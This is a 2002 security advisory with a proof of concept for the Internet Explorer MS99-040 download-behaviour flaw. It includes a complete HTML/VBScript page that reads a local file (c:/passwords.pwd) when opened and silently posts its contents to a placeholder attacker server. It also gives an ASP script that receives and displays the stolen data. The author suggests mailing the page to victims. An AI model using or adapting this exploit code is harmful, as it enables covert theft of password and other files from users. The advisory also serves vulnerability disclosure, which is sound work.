DLA-18-03-2002.txt

`** Digit-Labs Security Advisory (http://www.digit-labs.org/) **  
  
  
Advisory Name: MS99-040 Exploit  
Release Date: 18.3.2002  
Application: Tested on IE5.0 & IE 6  
Platform: Tested on Windows NT/XP  
Severity: Medium  
Author(s): GoLLuM.no [mailto:[email protected]]  
Vendor Status: Known since way back in September 28, 1999 (MS99-040)  
  
  
Executive Summary:  
Microsoft posted a security bullitin on this way back in September 28,   
1999, it is still exploitable though if the html file is run from the   
users local disk and not from a webserver or file-share.  
  
Microsoft does not tell you how it actually works, but  
since I am a nice person I will share it with you people... :-)  
  
  
Detailed Description:  
  
>From Internet Explorer 5 and onwards have several implemented   
'Behaviours', one of these is the So-called "Download Behaviour" which  
downloads a file and notifies a specified callback function when the   
download is complete. I does however have a security glitch that allows  
for download of files directly from the clients computer without   
his/her knowledge, these file could very well be password files or any  
other files that the client has access to. After the file is downloaded  
it can be posted to a server without the users knowledge. The danger is  
in someone mailing you an attached html-page that you open and then   
steals some files from you. Before the V5 patch this exploit would work  
from a Web-server too.  
  
  
Proof-of-concept:  
1.Create a file on your hardisk called c:\passwords.pwd  
2.Place the text "ginger:eqweqw234qwe213:Ginger Lynn:::" in the new  
file  
3.Create a new html-file somewhere on you PC (not on a web-server or  
fileshare) and call it download.htm  
4.Place the following content in the html-file you just created:  
  
<HTML XMLNS:IE>  
<IE:DOWNLOAD ID="oDownload" STYLE="behavior:url(#default#download)" />  
<SCRIPT LANGUAGE="vbscript">  
Function onDownloadDone(s)   
document.all.obj.value="a" & s  
document.all.myform.submit()  
End Function  
</SCRIPT>  
<body onload="vbscript:oDownload.startDownload   
'file:///c:/passwords.pwd', GetRef('onDownloadDone')">  
<form id="myform" action="http://www.yourserver.C0M/test.asp"   
method="post">  
<input type="hidden" value="oldval" id="obj" name="obj">  
</form>  
</body>  
  
5.Create a file on a webserver to recive the stolen file called test.asp  
and put the following in it if using ASP:  
  
<html>  
<head></head>  
<body>  
Stolen password file:  
<br>  
<%  
response.write request.form("obj")  
%>  
</body>  
</html>  
  
6.Run the html-file to test the exploit.  
  
See also:  
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/bulletin/ms99-040.asp  
  
  
  
  
`